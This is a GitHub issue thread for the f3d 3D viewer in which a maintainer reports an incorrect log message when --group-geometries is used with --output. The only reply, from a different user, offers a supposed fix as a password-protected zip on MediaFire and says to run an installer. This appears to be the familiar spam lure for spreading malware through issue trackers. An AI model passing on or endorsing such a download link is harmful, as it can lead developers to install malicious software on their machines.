### ISSUE TITLE
Wrong log with --group-geometries

### ISSUE THREAD

**Issue by mwestphal** [f3d-app/f3d#1592]
`./bin/f3d ../src/testing/data/cow.vtp ../src/testing/data/suzanne.stl --group-geometries --output=a.png`

:

`An output image was saved using a single 3D file, other provided 3D files were ignored.`

This is wrong

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
